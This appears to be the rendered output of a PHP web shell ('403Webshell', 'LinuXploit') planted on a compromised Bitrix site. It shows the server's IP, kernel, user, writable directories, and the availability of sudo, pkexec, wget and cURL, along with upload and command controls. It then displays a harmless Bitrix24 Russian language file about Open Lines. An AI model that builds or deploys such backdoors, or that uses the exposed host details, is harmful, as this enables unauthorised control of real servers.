403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/b24connector/lang/ru/admin/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/b24connector/lang/ru/admin/open_lines.php
<?
$MESS["B24C_OL_TITLE"] = "Открытые линии";
$MESS["B24C_OL_DESCR1"] = "Люди привыкли общаться через цифровые каналы: социальные сети и мессенджеры, потому что это быстро, доступно и удобно. Такой сценарий стал ожидаем и от компании, клиент хочет получить консультацию быстро, персонально и по конкретному вопросу.";
$MESS["B24C_OL_DESCR21"] = "Открытые линии Битрикс24 объединяют множество цифровых каналов:";
$MESS["B24C_OL_DESCR23"] = "Обращения клиентов собираются в один чат и автоматически распределяются по ответственным менеджерам.";
$MESS["B24C_OL_DESCR3"] = "Клиент обращается через удобный для него канал, а ваши менеджеры получают все сообщения в одном рабочем чате, могут маршрутизировать обращение между собой или привлекать в обсуждение коллег.";
$MESS["B24C_OL_DESCR4"] = "Все клиенты и вся история общения с ними будут автоматически зафиксированы в CRM.";
$MESS["B24C_OL_DESCR5"] = "Вы общаетесь в одном рабочем чате, а остальное Битрикс24 делает за вас: собирает сообщения, распределяет по очереди, записывает все в CRM, ведет статистику.";
$MESS["B24C_OL_GET_OL"] = "Перейти к открытым линиям Битрикс24";
$MESS["B24C_OL_OTHERS"] = "и другие.";

Youez - 2016 - github.com/yon3zu
LinuXploit